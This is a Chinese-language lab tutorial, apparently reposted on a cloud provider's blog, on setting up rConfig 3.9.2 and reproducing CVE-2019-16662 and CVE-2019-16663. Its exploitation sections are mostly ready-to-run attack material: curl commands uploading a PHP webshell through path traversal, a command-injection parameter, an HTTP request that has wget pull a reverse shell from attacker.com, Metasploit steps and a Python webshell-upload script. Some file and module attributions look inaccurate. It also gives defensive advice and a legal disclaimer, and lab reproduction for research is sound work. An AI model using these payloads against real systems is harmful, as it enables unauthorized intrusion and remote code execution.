溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行rConfig-CVE漏洞復現及環境搭建

發布時間:2021-12-10 16:32:24 來源:億速云 閱讀:541 作者:柒染 欄目:大數據
# 如何進行rConfig-CVE漏洞復現及環境搭建

## 前言

rConfig是一款開源的網絡設備配置管理工具,廣泛用于企業網絡管理中。近年來,rConfig被曝出多個高危漏洞(如CVE-2019-16662、CVE-2019-16663等),這些漏洞可能導致遠程代碼執行(RCE)和敏感信息泄露。本文將通過完整的實驗環境搭建和漏洞復現過程,幫助安全研究人員深入理解這些漏洞的利用方式。

---

## 一、漏洞背景

### 1.1 受影響版本
- rConfig 3.9.2及更早版本
- 關鍵CVE編號:
  - **CVE-2019-16662**:未授權RCE漏洞
  - **CVE-2019-16663**:認證后RCE漏洞

### 1.2 漏洞原理
- **文件上傳繞過**:通過構造惡意請求繞過上傳限制
- **命令注入**:`ajaxServerSettingsChk.php`等文件未過濾用戶輸入
- **路徑遍歷**:`lib/crud/userprocess.php`存在目錄穿越

---

## 二、環境搭建

### 2.1 實驗環境要求
- **操作系統**:Kali Linux 2023/Ubuntu 20.04
- **依賴組件**:
  - Apache 2.4+
  - PHP 5.6/7.0(需兼容舊版rConfig)
  - MySQL 5.7
- **網絡配置**:NAT模式(建議使用虛擬機)

### 2.2 安裝步驟

#### 步驟1:下載rConfig 3.9.2
```bash
wget https://github.com/rconfig/rconfig/archive/v3.9.2.zip
unzip v3.9.2.zip -d /var/www/html/
chown -R www-data:www-data /var/www/html/rconfig-3.9.2

步驟2:配置數據庫

CREATE DATABASE rconfig;
GRANT ALL PRIVILEGES ON rconfig.* TO 'rconfig'@'localhost' IDENTIFIED BY 'P@ssw0rd';
FLUSH PRIVILEGES;

步驟3:修改PHP配置

# /etc/php/7.0/apache2/php.ini
allow_url_fopen = On
allow_url_include = On

步驟4:完成安裝

訪問 http://localhost/rconfig-3.9.2/install 按向導完成安裝。

注意:安裝后務必刪除install目錄!


三、漏洞復現(CVE-2019-16662)

3.1 未授權文件上傳漏洞

漏洞文件lib/crud/userprocess.php

復現步驟:

  1. 構造惡意請求上傳PHP webshell:
curl -X POST "http://<target>/lib/crud/userprocess.php" \
  -F "file=@/tmp/shell.php" \
  -F "userid=../../../../../../../../var/www/html/shell"
  1. 驗證上傳成功:
curl http://<target>/shell.php -d "system=id"

3.2 命令注入漏洞

漏洞文件install/lib/ajaxHandlers/ajaxServerSettingsChk.php

復現步驟:

curl "http://<target>/install/lib/ajaxHandlers/ajaxServerSettingsChk.php" \
  -d "rootpw=1|id>&2"

四、漏洞復現(CVE-2019-16663)

4.1 認證后RCE漏洞

前置條件:需獲取有效管理員憑證(默認admin/rconfig)

復現步驟:

  1. 登錄后臺獲取Cookie
  2. 利用備份功能執行命令:
POST /commands.inc.php HTTP/1.1
Host: <target>
Cookie: PHPSESSID=<session_id>

backupDir=;/usr/bin/wget+http://attacker.com/revshell+-O+/tmp/revshell

五、防御建議

5.1 官方修復方案

  • 升級到rConfig 3.9.3+版本
  • 補丁關鍵修改:
    • 增加.htaccess限制文件上傳類型
    • 過濾exec()/system()函數參數

5.2 臨時緩解措施

# Apache配置示例
<Directory "/var/www/html/rconfig/lib/crud">
  Order Deny,Allow
  Deny from all
</Directory>

六、擴展實驗

6.1 Metasploit模塊利用

msf6 > use exploit/unix/webapp/rconfig_ajaxsave_rce
msf6 > set RHOSTS <target>
msf6 > exploit

6.2 漏洞利用自動化腳本

import requests

target = "http://192.168.1.100"
payload = "<?php system($_GET['cmd']);?>"

files = {'file': ('shell.php', payload)}
requests.post(f"{target}/lib/crud/userprocess.php", files=files)

結論

通過本實驗,我們驗證了rConfig多個高危漏洞的利用鏈。安全團隊應重點關注: 1. 網絡管理系統的輸入驗證 2. 最小權限原則的應用 3. 定期進行安全審計

法律聲明:本實驗僅限授權測試,未經許可不得對真實系統進行漏洞利用。


附錄

”`

注:實際執行時需根據具體環境調整路徑和參數,建議在隔離的虛擬化環境中操作。文中部分Payload已做無害化處理。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女